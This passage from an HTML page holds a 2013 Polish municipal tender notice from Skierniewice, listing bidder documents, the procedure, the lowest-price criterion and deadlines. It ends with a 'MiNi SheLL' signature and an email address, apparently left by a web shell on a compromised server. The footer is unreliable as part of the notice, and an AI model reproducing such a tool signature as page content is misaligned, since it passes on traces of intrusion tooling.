5. Wykaz narzędzi i urządzeń technicznych dostępnych wykonawcy w celu realizacji zamówienia, według wzoru załącznik nr 4 do SIWZ.
6.Opłaconą polisę, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100 000,00zł(słownie: sto tysięcy złotych)
7.Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie na łączną kwotę min. 50 000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych brutto), zgodnie z treścią załącznika nr 9 do SIWZ. Wykaz musi potwierdzać spełnienie warunku, o którym mowa w punkcie 4.1.1. SIWZ. 
8.Informację o przynależności do grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp wraz z listą podmiotów należących do tej samej grupy kapitałowej, lub informację o tym, że nie należy do grupy kapitałowej - według wzoru stanowiącego załącznik nr 10 do SIWZ. 
9.Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą, przyjmuje się, że pełnomocnictwo do złożenia oferty upoważnia również do poświadczenia za zgodność z oryginałem kopii wszystkich dokumentów składanych wraz z ofertą, chyba, że z treści pełnomocnictwa wynika co innego.
10.W przypadku Wykonawców występujących wspólnie na podstawie art. 23 ustawy do   oferty należy dołączyć dokumenty:
1. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego, o którym mowa w art. 23 ustawy.
2. Dokumenty wymienione w pkt. 5.2.1, 5.2.3, 5.2.4, 5.2.5 do SIWZ i 5.2.6 SIWZ muszą być złożone przez każdy podmiot wchodzący w skład konsorcjum.
W przypadku ofert składanych wspólnie dokumenty wymienione w pkt. 5.1, 5.2.2 do SIWZ, muszą być dostarczone wspólnie lub przynajmniej przez jeden podmiot wchodzący w skład konsorcjum.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Skierniewice ul. Rynek 1 96-100 Skierniewice Wydział Dróg i Komunikacji (wejście od Placu św. Floriana, pokój nr 6).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2013 godzina 10:00, miejsce: Urząd Miasta Skierniewice ul. Rynek 1 96-100 Skierniewice sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com